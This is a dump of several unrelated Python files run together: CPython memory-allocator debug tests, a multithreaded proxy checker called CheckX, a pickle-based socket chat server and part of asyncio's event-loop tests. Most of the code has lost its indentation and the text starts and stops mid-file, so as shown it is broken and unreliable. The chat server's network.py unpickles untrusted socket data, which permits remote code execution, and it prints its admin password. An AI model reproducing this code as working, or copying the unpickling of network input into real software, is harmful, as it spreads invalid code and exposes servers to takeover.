PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
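        # Run the code in a subprocess with the debug memory hooks selected via
        # PYTHONMALLOC and return its decoded stderr (the run is expected to fail).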
with support.SuppressCrashReport():
out = assert_python_failure(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
# FreeBSD: instruct jemalloc to not fill freed() memory
# with junk byte 0x5a, see JEMALLOC(3)
MALLOC_CONF="junk:false",
)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
MALLOC_CONF="junk:false",
)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
def test_get_module_bad_def(self):
# PyType_GetModuleByDef fails gracefully if it doesn't
# find what it's looking for.
# see bpo-46433
instance = self.module.StateAccessType()
with self.assertRaises(TypeError):
instance.getmodulebydef_bad_def()
def test_get_module_static_in_mro(self):
# Here, the class PyType_GetModuleByDef is looking for
# appears in the MRO after a static type (Exception).
# see bpo-46433
class Subclass(BaseException, self.module.StateAccessType):
pass
self.assertIs(Subclass().get_defining_module(), self.module)
if __name__ == "__main__":
unittest.main()
|
CheckX.py
|
from multiprocessing.dummy import Pool as ThreadPool
from os import path, mkdir, system, name
from threading import Thread, Lock
from time import sleep, strftime, gmtime, time
from traceback import format_exc
from colorama import Fore, init
from console.utils import set_title
from easygui import fileopenbox
from requests import Session, exceptions
from yaml import safe_load
default_values = '''checker:
# Check if current version of CheckX is latest
check_for_updates: true
# Remove duplicate proxies
remove_duplicates: true
# Check site
check_site: 'https://azenv.net'
# Save dead proxies
save_dead: true
  # Normal users should keep this false unless problems start happening
debugging: false
'''
if path.exists('Settings.yml'):
settings = safe_load(open('Settings.yml', 'r', errors='ignore'))
else:
open('Settings.yml', 'w').write(default_values)
settings = safe_load(open('Settings.yml', 'r', errors='ignore'))
class Main:
def __init__(self):
self.dead = 0
self.live = 0
self.cpm = 0
self.trasp = 0
self.checked = 0
self.stop = True
self.start_time = 0
self.announcement = ''
self.checktype = ''
self.timeout = 5000
self.threads = 200
# self.checkforupdates()
self.settings()
self.loadproxy()
self.resultfolder()
self.get_announcement()
self.start()
def now_time(self):
return strftime("%H:%M:%S", gmtime(time() - self.start_time))
    def writing(self, line):
        with lock:
            open(f'{self.folder}/{line[1]}.txt', 'a', encoding='u8').write(f'{line[0]}\n')
def check_proxies(self, proxy):
proxy_form = {}
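        # A proxy with four colon-separated fields (apparently host:port:user:pass)
        # is rewritten to user:pass@host:port so requests can use it as an
        # authenticated proxy.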
if proxy.count(':') == 3:
spl = proxy.split(':')
proxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
if self.checktype in ['https', 'http']:
proxy_form = {'http': f"http://{proxy}", 'https': f"https://{proxy}"}
elif self.checktype in ['socks4', 'socks5']:
line = f"{self.checktype}://{proxy}"
proxy_form = {'http': line, 'https': line}
try:
r = session.get(url=Checker.check_site, proxies=proxy_form, timeout=self.timeout).text
self.checked += 1
if r.__contains__(myip):
self.trasp += 1
self.writing([proxy, 'Transparent'])
else:
self.live += 1
self.writing([proxy, 'Live'])
return
except exceptions.RequestException:
self.dead += 1
self.checked += 1
if Checker.save_dead:
self.writing([proxy, 'Bad'])
return
except:
if Checker.debug:
print(f'Error: {format_exc(limit=1)}')
return
    def title(self):
while self.stop:
proxies = len(self.proxylist)
set_title(
f'CheckX-{version} | '
f'{"" if self.live == 0 else f" | Live: {self.live}"}'
f'{"" if self.dead == 0 else f" | Dead: {self.dead}"}'
f'{"" if self.trasp == 0 else f" | Transparent: {self.trasp}"}'
f' | Left: {proxies - self.checked}/{proxies}'
f' | CPM: {self.cpm}'
f' | {self.now_time()} Elapsed')
def cpmcounter(self):
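        # Estimate checks-per-minute by sampling how many proxies were checked
        # over a 4-second window and scaling by 15 (4 s * 15 = 60 s).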
while self.stop:
if self.checked >= 1:
now = self.checked
sleep(4)
self.cpm = (self.checked - now) * 15
def checkforupdates(self):
try:
gitversion = session.get("https://raw.githubusercontent.com/ShadowOxygen/CheckX/master/version").text
if f'{version}\n' != gitversion:
print(sign)
print(f"{red}Your version is outdated.")
print(f"Your version: {version}\n")
print(f'Latest version: {gitversion}Get latest version in the link below')
print(f"https://github.com/ShadowOxygen/CheckX/releases\nStarting in 5 seconds...{cyan}")
sleep(5)
clear()
except:
if Checker.debug:
print(f"{red} Error while checking for updates: \n{format_exc(limit=1)}\n")
def loadproxy(self):
while True:
try:
print(f"\n{cyan}[+] Please Import Your Proxies List.....")
sleep(0.3)
loader = open(fileopenbox(title="Load Proxies List", default="*.txt"), 'r', encoding="utf8",
errors='ignore').read().split('\n')
if Checker.remove_dup:
self.proxylist = list(set([x.strip() for x in loader if ":" in x and x != '']))
else:
self.proxylist = [x.strip() for x in loader if ":" in x and x != '']
length_file = len(self.proxylist)
if length_file == 0:
                    print(f'{red}No proxies found! Please make sure the file has proxies...')
continue
print(f"{cyan} > Imported {length_file} proxies from File")
break
except:
if Checker.debug:
print(f"{red}Error while loading proxies: \n{format_exc(limit=1)}\n")
continue
def get_announcement(self):
try:
announcement = session.get(
'https://raw.githubusercontent.com/ShadowOxygen/OxygenX/master/announcement').text.split("Color: ")
color = announcement[1].lower()
if color == 'red\n':
color = red
elif color == 'white\n':
color = white
elif color == 'blue\n':
color = Fore.LIGHTBLUE_EX
elif color == 'green\n':
color = green
elif color == 'cyan\n':
color = cyan
elif color == 'magenta\n':
color = Fore.LIGHTMAGENTA_EX
elif color == 'yellow\n':
color = Fore.LIGHTYELLOW_EX
self.announcement = f"{color}{announcement[0]}"
except:
if Checker.debug:
print(f"{red}Error while displaying announcement: \n{format_exc(limit=1)}\n")
return
def resultfolder(self):
unix = str(strftime('[%d-%m-%Y %H-%M-%S]'))
self.folder = f'results/{unix}'
if not path.exists('results'):
mkdir('results')
if not path.exists(self.folder):
mkdir(self.folder)
def start(self):
print('\nLoading Threads...\n')
Thread(target=self.cpmcounter, daemon=True).start()
pool = ThreadPool(processes=self.threads)
clear()
        Thread(target=self.title).start()
print(sign)
print(self.announcement)
print(f'{green}=======Settings=========\n'
f'[S] Threads: {self.threads}\n'
f'[S] Timeout: {self.timeout}s\n'
f'[S] Proxy type: {self.checktype}\n'
'========================\n')
print(f'{cyan}[Z] Please wait for proxies to finish checking...')
self.start_time = time()
pool.imap_unordered(func=self.check_proxies, iterable=self.proxylist)
pool.close()
pool.join()
self.stop = False
cyanz = f'{white}[{Fore.CYAN}>{white}]'
results = f'\n{cyanz} Live proxies: {green}{self.live}\n' \
f'{cyanz} Transparent proxies: {Fore.LIGHTYELLOW_EX}{self.trasp}\n' \
f'{cyanz} Dead proxies: {red}{self.dead}\n' \
f'{cyanz} Speed: {cyan}{round(self.checked / (time() - self.start_time), 2)} proxies/s\n' \
f'{cyanz} Total time checking: {cyan}{self.now_time()}\n\n' \
f'{red}\n[EXIT] You can now exit the program...'
print(results)
input()
exit()
def settings(self):
print(sign)
self.threads = int(input('[+] Threads for Checking (Needs to be more than 1): '))
while True:
self.checktype = str(input('[+] Proxy Type (HTTP, HTTPS, SOCKS4, SOCKS5): ')).lower()
if self.checktype not in ['https', 'http', 'socks4', 'socks5']:
print(f'{red}[Error] Proxy type is not https, http, socks4, socks5. Please reenter')
continue
else:
break
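        # requests interprets timeouts in seconds, so the millisecond input is
        # converted before being passed to session.get() in check_proxies().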
self.timeout = int(input('[+] Proxy timeout (counted in milliseconds: 1000 = 1 second): ')) / 1000
class Checker:
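    # Settings.yml values exposed as class attributes, coerced to the types
    # the checker expects.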
version_check = bool(settings['checker']['check_for_updates'])
remove_dup = bool(settings['checker']['remove_duplicates'])
check_site = str(settings['checker']['check_site']).lower()
save_dead = bool(settings['checker']['save_dead'])
debug = bool(settings['checker']['debugging'])
if __name__ == '__main__':
init()
clear = lambda: system('cls' if name == 'nt' else 'clear')
lock = Lock()
version = '2.0'
session = Session()
red = Fore.LIGHTRED_EX
green = Fore.LIGHTGREEN_EX
cyan = Fore.LIGHTCYAN_EX
white = Fore.LIGHTWHITE_EX
sign = f'''{cyan}
_________ .__ __ ____ ___
\_ ___ \| |__ ____ ____ | | __\ \/ /
/ \ \/| | \_/ __ \_/ ___\| |/ / \ /
\\ \___| Y \ ___/\ \___| < / \\
\______ /___| /\___ >\___ >__|_ \/___/\ \\
\/ \/ \/ \/ \/ \_/
\n'''
myip = str(session.get('http://api.ipify.org').text)
set_title(f'CheckX-{version} | By ShadowOxygen')
Main()
|
network.py
|
from . import settings as globalsettings
from . import functions, command
import socket, pickle, datetime, errno, select
from threading import Thread
class User():
def __init__(self, socket, ip, username=''):
self.socket = socket
self.ip = ip
self.username = username
self.admin = False
def get_user_ip(self):
return self.ip
def set_user_name(self, new_name):
self.username = new_name
def get_user_name(self):
return self.username
def close_connection(self):
self.socket.close()
def send_message(self, msgtype, message):
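        # Each message is a pickled dict with 'type' and 'message' keys. There is
        # no length framing, so the receiver presumably relies on one recv() per
        # message (see Network.listen_to_packets).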
try:
self.socket.send(pickle.dumps({'type': msgtype, 'message': message}))
except ConnectionResetError:
print('user %s has probably disconnected.' % (self.get_user_name()))
Network.online_users.remove(self)
del self
except Exception as exception:
print(f'Could not send message to user {self.get_user_name()} error code: {exception}')
def set_admin(self, toggle):
self.admin = toggle
if toggle:
            print(self.get_user_name() + " has logged in as server administrator.")
def is_admin(self):
return self.admin
def kick_user(self):
print(self.get_user_name() + " has been kicked from the server!")
Network.online_users.remove(self)
del self
class Network():
online_users = []
rcon_password = ''
def __init__(self, hostname, port, max_users, rcon_pass, channels):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
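        # socket.SIO_KEEPALIVE_VALS is a Windows-only ioctl; the tuple is
        # (enable, idle time in ms, interval in ms), so this server presumably
        # targets Windows.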
self.sock.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 10000, 3000))
self.hostname = hostname
self.max_users = max_users
self.rcon_pass = rcon_pass
Network.rcon_password = rcon_pass
        self.channels = [{'channel_name': channel, 'messages': []} for channel in channels]
self.sock.bind((socket.gethostname(), port))
self.sock.listen(5)
self.sock.settimeout(1)
print(f"{hostname} has been setup with the following settings: ")
print(f"port: {port}")
print(f"Max user count: {max_users}")
print(f"Rcon password: {rcon_pass}")
print(f"Channels: {channels}")
#first two parameters are reserved for user and channelname for every command function
self.rcon_command = command.Command('rcon', functions.rcon)
self.connection_thread = Thread(target=self.listen_to_connection)
self.packets_thread = Thread(target=self.listen_to_packets)
def start(self):
print("Server has started")
self.connection_thread.start()
self.packets_thread.start()
def listen_to_connection(self):
while True:
try:
                #connection requests are ignored if the current user count equals or exceeds the maximum count.
if len(Network.online_users) >= self.max_users:
continue
socket, address = self.sock.accept()
socket.setblocking(0)
new_user = User(socket, address)
new_user.set_user_name(socket.recv(globalsettings.USERNAME_BUFFER).decode('UTF-8'))
try:
if len([user for user in Network.online_users if user.get_user_name() == new_user.get_user_name()]):
new_user.close_connection()
print("closing connection for this user...")
else:
print("Adding user %s" % (new_user.get_user_name()))
Network.online_users.append(new_user)
                        temp_users = [{'username': user.get_user_name(), 'id': i} for i, user in enumerate(Network.online_users)]
                        #temp aliases self.channels; each channel's message list is trimmed to the latest MAX_LOAD_MESSAGES_COUNT entries (note this also truncates the server-side history) before the channels are sent to the new user
temp = self.channels
[channel.update(messages=channel['messages'][len(channel['messages'])-globalsettings.MAX_LOAD_MESSAGES_COUNT:]) for channel in temp if len(channel['messages']) > globalsettings.MAX_LOAD_MESSAGES_COUNT]
time = datetime.datetime.now()
join_message = f"<{time.hour}:{time.minute}:{time.second}> {new_user.get_user_name()} has joined the chat."
self.channels[0]['messages'].append(join_message)
new_user.send_message(globalsettings.SERVER_DETAILS, {'channels': temp, 'users': temp_users})
[user.send_message(globalsettings.SERVER_DETAILS, {'users': temp_users}) for user in Network.online_users if user != new_user]
[user.send_message(globalsettings.SERVER_MESSAGE, {'channel_name': self.channels[0]['channel_name'], 'message': join_message}) for user in Network.online_users if user != new_user]
except Exception as exception:
print(exception)
except:
pass
def listen_to_packets(self):
while True:
try:
messages = []
for user in Network.online_users:
try:
messages.append(functions.update_dict(pickle.loads(user.socket.recv(globalsettings.MAX_BUFFER)), 'user', user))
except ConnectionResetError:
time = datetime.datetime.now()
[user_ex.send_message(globalsettings.USER_LEFT,{'channel_name': self.channels[0]['channel_name'], 'username': user.get_user_name(), 'time': time}) for user_ex in Network.online_users if user_ex != user]
self.channels[0]['messages'].append(f"<{time.hour}:{time.minute}:{time.second}> {user.get_user_name()} has left the chat.")
print(self.channels[0]['messages'][len(self.channels[0]['messages'])-1])
Network.online_users.remove(user)
except:
pass
if len(messages):
#
time_text = f'<{datetime.datetime.now().hour}:{datetime.datetime.now().minute}:{datetime.datetime.now().second}>'
#sends every message to every user in the right channel...
for user in Network.online_users: [user.send_message(globalsettings.SERVER_MESSAGE,{'channel_name': message['channel_name'], 'message': functions.append_return([channel for channel in self.channels if channel['channel_name'] == message['channel_name']][0]['messages'], time_text + ' ' + message['user'].get_user_name() + ': ' + message['message'])}) for message in messages if message['message'][0] != globalsettings.COMMAND_PREFIX]
#removes every message that isn't starting with the command prefix
messages = [message for message in messages if message['message'][0] == globalsettings.COMMAND_PREFIX]
#
for message in messages:
#eliminates white spaces and splits the message
message_split = functions.split(message['message'])
try: [command for command in command.Command.server_commands if command.text == message_split[0][1:]][0].execute(message['user'], message['channel_name'],*message_split[1:])
#IndexError gets thrown when list index (0) out of range meaning no user with the specified name was found
except IndexError: message['user'].send_message(globalsettings.SERVER_MESSAGE, {'channel_name': message['channel_name'], 'message': 'Unknown command'})
#
except: message['user'].send_message(globalsettings.SERVER_MESSAGE, {"channel_name": message['channel_name'],"message":"Invalid command usage."})
except Exception as exception:
print(exception)
|
test_events.py
|
"""Tests for events.py."""
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
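    # Shared event-loop tests: concrete subclasses are expected to provide
    # create_event_loop() (used in setUp) so the same suite runs against each
    # loop implementation.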
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
        # just in case we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
